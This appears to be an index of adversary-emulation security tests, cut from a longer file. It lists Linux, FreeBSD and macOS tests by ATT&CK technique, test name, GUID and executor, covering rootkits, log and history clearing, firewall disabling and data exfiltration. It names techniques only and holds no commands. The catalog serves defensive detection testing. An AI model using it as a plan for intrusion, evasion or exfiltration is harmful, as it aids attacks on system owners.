discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - netstat,d2791d72-b67f-4615-814f-ec824a91f514,sh
discovery,T1018,Remote System Discovery,15,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,12,Port Scan using nmap (Port range),0d5a2b03-3a26-45e4-96ae-89485b4d1f97,sh
discovery,T1124,System Time Discovery,3,System Time Discovery in FreeBSD/macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,13,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,14,Shell Creation using awk command,ee72b37d-b8f5-46a5-a9e7-0ff50035ffd5,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,15,Creating shell using cpan command,bcd4c2bc-490b-4f91-bd31-3709fe75bbdf,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,16,Shell Creation using busybox command,ab4d04af-68dc-4fee-9c16-6545265b3276,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,17,emacs spawning an interactive system shell,e0742e38-6efe-4dd4-ba5c-2078095b6156,sh
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,sh
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-427f-aa08-2a65fa29a820,sh
impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (FreeBSD/Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,sh
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (FreeBSD/Linux),142752dc-ca71-443b-9359-cf6f497315f1,sh
impact,T1496,Resource Hijacking,1,FreeBSD/macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,sh
impact,T1485,Data Destruction,2,FreeBSD/macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,sh
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - FreeBSD/Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,sh
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - FreeBSD,7b1cee42-320f-4890-b056-d65c8b884ba5,sh
impact,T1529,System Shutdown/Reboot,8,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,sh
impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
impact,T1529,System Shutdown/Reboot,16,Abuse of Linux Magic System Request Key for Reboot,d2a1f4bc-a064-4223-8281-a086dce5423c,bash
initial-access,T1195.002,Compromise Software Supply Chain,1,Simulate npm package installation on a Linux system,a9604672-cd46-493b-b58f-fd4124c22dd3,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,3,Exfiltrate data in a file over HTTPS using wget,7ccdfcfa-6707-46bc-b812-007ab6ff951c,sh
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,4,Exfiltrate data as text over HTTPS using wget,8bec51da-7a6d-4346-b941-51eca448c4b0,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,2,Exfiltrate data with rclone to cloud Storage - AWS S3,a4b74723-5cee-4300-91c3-5e34166909b4,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
3 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM rule (freebsd) b17eacac-282d-4ca8-a240-46602cf863e3 sh
4 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 3 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
5 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 sh
6 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 sh
7 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 sh
8 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
9 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
10 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
11 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 sh
12 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
13 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
14 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 10 chflags - Remove immutable file attribute 60eee3ea-2ebd-453b-a666-c52ce08d2709 sh
15 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 11 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
16 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 12 Chmod through c script (freebsd) da40b5fe-3098-4b3b-a410-ff177e49ee2e sh
17 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 13 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
18 defense-evasion T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification 14 Chown through c script (freebsd) eb577a19-b730-4918-9b03-c5edcf51dc4e sh
19 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 1 Decode Eicar File and Write to File 7693ccaa-8d64-4043-92a5-a2eb70359535 powershell
20 defense-evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File 2 Decrypt Eicar File and Write to File b404caaa-12ce-43c7-9214-62a531c044f7 powershell
21 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
22 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
23 defense-evasion T1014 Rootkit 3 dynamic-linker based rootkit (libprocesshider) 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 sh
24 defense-evasion T1014 Rootkit 4 Loadable Kernel Module based Rootkit (Diamorphine) 0b996469-48c6-46e2-8155-a17f8b6c2247 sh
25 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
26 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Sudo usage (freebsd) 2bf9a018-4664-438a-b435-cc6f8c6f71b1 sh
27 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
28 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 4 Unlimited sudo cache timeout (freebsd) a83ad6e8-6f24-4d7f-8f44-75f8ab742991 sh
29 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 5 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
30 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 6 Disable tty_tickets for sudo caching (freebsd) 4df6a0fe-2bdd-4be8-8618-a6a19654a57a sh
31 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
32 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
33 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (FreeBSD) e129d73b-3e03-4ae9-bf1e-67fc8921e0fd sh
34 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
35 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 2 rm -rf bd8ccc45-d632-481e-b7cf-c467627d68f9 sh
36 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 5 Truncate system log files via truncate utility (freebsd) 14033063-ee04-4eaf-8f5d-ba07ca7a097c sh
37 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 7 Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) 369878c6-fb04-48d6-8fc2-da9d97b3e054 sh
38 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 10 Overwrite FreeBSD system log via echo utility 11cb8ee1-97fb-4960-8587-69b8388ee9d9 sh
39 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 13 Delete system log files via unlink utility (freebsd) 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2 sh
40 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 18 Delete system journal logs via rm and journalctl utilities ca50dd85-81ff-48ca-92e1-61f119cb1dcf sh
41 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 19 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
42 defense-evasion T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs 20 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
43 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
44 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
45 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
46 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
47 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 5 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
48 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
49 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 bash
50 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
51 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
52 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 10 Clear Docker Container Logs 553b39f9-1e8c-47b1-abf5-8daf7b0391e9 bash
53 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
54 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
55 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
56 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Base64 decoding with shell utilities (freebsd) b6097712-c42e-4174-b8f2-4b1e1a5bbb3d sh
57 defense-evasion T1140 Deobfuscate/Decode Files or Information 7 FreeBSD b64encode Shebang in CLI 18ee2002-66e8-4518-87c5-c0ec9c8299ac sh
58 defense-evasion T1140 Deobfuscate/Decode Files or Information 8 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
59 defense-evasion T1140 Deobfuscate/Decode Files or Information 9 Linux Base64 Encoded Shebang in CLI 3a15c372-67c1-4430-ac8e-ec06d641ce4d sh
60 defense-evasion T1140 Deobfuscate/Decode Files or Information 10 XOR decoding and command execution using Python c3b65cd5-ee51-4e98-b6a3-6cbdec138efc bash
61 defense-evasion T1562 Impair Defenses 2 Disable journal logging via systemctl utility c3a377f9-1203-4454-aa35-9d391d34768f sh
62 defense-evasion T1562 Impair Defenses 3 Disable journal logging via sed utility 12e5551c-8d5c-408e-b3e4-63f53b03379f sh
63 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 2 Copy and Delete Mailbox Data on Linux 25e2be0e-96f7-4417-bd16-a4a2500e3802 bash
64 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 5 Copy and Modify Mailbox Data on Linux 6d99f93c-da56-49e3-b195-163090ace4f6 bash
65 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
66 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
67 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
68 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
69 defense-evasion T1497.003 Time Based Evasion 1 Delay execution with ping 8b87dd03-8204-478c-bac3-3959f6528de3 sh
70 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
71 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 8 Stop/Start Packet Filter 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7 sh
72 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 9 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
73 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 10 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
74 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 11 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
75 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 12 Add and delete Packet Filter rules 8b23cae1-66c1-41c5-b79d-e095b6098b5b sh
76 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 13 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
77 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 14 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
78 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 15 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
79 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 16 Edit UFW firewall main configuration file 7b697ece-8270-46b5-bbc7-6b9e27081831 sh
80 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 17 Tail the UFW firewall log file 419cca0c-fa52-4572-b0d7-bc7c6f388a27 sh
81 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 18 Disable iptables 7784c64e-ed0b-4b65-bf63-c86db229fd56 sh
82 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 19 Modify/delete iptables firewall rules 899a7fb5-d197-4951-8614-f19ac4a73ad4 sh
83 defense-evasion T1562.012 Impair Defenses: Disable or Modify Linux Audit System 1 Delete all auditd rules using auditctl 33a29ab1-cabb-407f-9448-269041bf2856 sh
84 defense-evasion T1562.012 Impair Defenses: Disable or Modify Linux Audit System 2 Disable auditd using auditctl 7906f0a6-b527-46ee-9026-6e81a9184e08 sh
85 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
86 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 2 Pad Binary to Change Hash using truncate command - Linux/macOS e22a9e89-69c7-410f-a473-e6c212cd2292 sh
87 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
88 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
89 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
90 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Make and modify binary from C source (freebsd) dd580455-d84b-481b-b8b0-ac96f3b1dc4c sh
91 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
92 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Set a SetUID flag on file (freebsd) 9be9b827-ff47-4e1b-bef8-217db6fb7283 sh
93 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
94 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Set a SetGID flag on file (freebsd) 1f73af33-62a8-4bf1-bd10-3bea931f2c0d sh
95 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
96 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 8 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
97 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 9 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
98 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 10 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
99 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
100 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 2 Auditing Configuration Changes on FreeBSD Host cedaf7e7-28ee-42ab-ba13-456abd35d1bd sh
101 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 3 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
102 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 4 Logging Configuration Changes on FreeBSD Host 6b8ca3ab-5980-4321-80c3-bcd77c8daed8 sh
103 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 3 linux rename /proc/pid/comm using prctl f0e3aaea-5cd9-4db6-a077-631dd19b27a8 sh
104 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 4 Hiding a malicious process with bind mounts ad4b73c2-d6e2-4d8b-9868-4c6f55906e01 sh
105 defense-evasion T1562.010 Impair Defenses: Downgrade Attack 1 ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI 062f92c9-28b1-4391-a5f8-9d8ca6852091 powershell
106 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
107 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 2 Disable history collection (freebsd) cada55b4-8251-4c60-819e-8ec1b33c9306 sh
108 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 3 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
109 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 4 Clear bash history 878794f7-c511-4199-a950-8c28b3ed8e5b bash
110 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 5 Setting the HISTCONTROL environment variable 10ab786a-028e-4465-96f6-9e83ca6c5f24 bash
111 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 6 Setting the HISTFILESIZE environment variable 5cafd6c1-2f43-46eb-ac47-a5301ba0a618 bash
112 defense-evasion T1562.003 Impair Defenses: Impair Command History Logging 7 Setting the HISTSIZE environment variable 386d3850-2ce7-4508-b56b-c0558922c814 sh
